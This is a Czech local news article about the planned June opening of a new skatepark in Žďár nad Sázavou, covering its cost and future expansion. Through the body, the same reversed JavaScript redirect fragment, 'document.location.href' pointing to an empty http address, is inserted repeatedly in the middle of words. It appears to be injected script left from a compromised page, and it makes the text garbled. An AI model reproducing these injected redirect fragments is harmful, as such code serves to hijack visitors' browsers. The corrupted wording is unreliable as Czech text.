Rainbow page separator

Nový skatepark slavnostně uvedou do provozu začátkem června

Neděle, 15. dubna 2018

Žďár nad Sázavou / Na 2. června plánuje žďárská radnice slavnostní otevření nového skateparku, které má být zároveň spojeno se soutěží skateboardistů. V současné době již spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zařízení, které bylo dostavěno loni na podzim, veřejnost využívá, okolo se ještě dokončují poslední terénní úpravy, jako je například osetí plochy travním semenem a podobně.
Skatepark s monolitickou be[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonovou vanou a jednoduchým sociálním zařízením je zároveň první etapou výstavby takzvaného outdoor street parku. Včetně nové technické infrastruktury v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zóně vyšel na 6,63 milionu korun.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos Žďár plánuje začít s projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním další části spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště, které bude určeno především pro neorganizované spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce, kteří provozují různé alternativní disciplíny, jako jsou například parkour, streetbal, flowerstick či pumptrack.